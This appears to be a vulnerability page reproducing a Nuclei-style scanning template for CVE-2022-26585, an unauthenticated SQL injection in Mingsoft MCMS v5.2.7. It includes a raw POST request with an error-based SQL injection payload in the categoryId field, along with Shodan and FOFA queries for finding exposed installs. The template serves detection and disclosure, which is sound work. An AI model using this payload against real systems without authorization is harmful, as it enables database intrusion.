漏洞描述
Mingsoft MCMS v5.2.7 contains an SQL injection vulnerability via /cms/content/list that allows unauthenticated attackers to execute arbitrary SQL commands on the affected database server.
CVE-2022-26585: Mingsoft MCMS v5.2.7 - SQL Injection
PoC代码[已公开]
id: CVE-2022-26585
info:
name: Mingsoft MCMS v5.2.7 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Mingsoft MCMS v5.2.7 contains an SQL injection vulnerability via /cms/content/list that allows unauthenticated attackers to execute arbitrary SQL commands on the affected database server.
remediation: |
Upgrade Mingsoft MCMS to version 5.2.8 or later, which contains patches for this vulnerability.
reference:
- https://gitee.com/mingSoft/MCMS/issues/I4W1S9
- https://nvd.nist.gov/vuln/detail/CVE-2022-26585
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-26585
cwe-id: CWE-89
epss-score: 0.33843
epss-percentile: 0.9683
cpe: cpe:2.3:a:mingsoft:mcms:5.2.7:*:*:*:*:*:*:*
metadata:
vendor: mingsoft
product: mcms
verified: true
max-request: 1
shodan-query: http.favicon.hash:1464851260
fofa-query: icon_hash="1464851260"
tags: cve,cve2022,mingsoft,mcms,sqli
variables:
num: "999999999"
http:
- raw:
- |
POST /cms/content/list HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
categoryId=2' AND GTID_SUBSET(CONCAT(0x716a717871,md5({{num}}),0x716a627a71),3762) AND 'EIVI'='EIVI
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf'
- type: status
status:
- 200
- 500
# digest: 4a0a00473045022100b3e4126d96a28ba8a8f183ad77db97089d1447ee159957ed1676c6e90ffeb817022040fe99552a403f3fc5986ba1f5a78afc06fe33da9495b8897441ba23d63deb5d:922c64590222798bb761d5b6d8e72950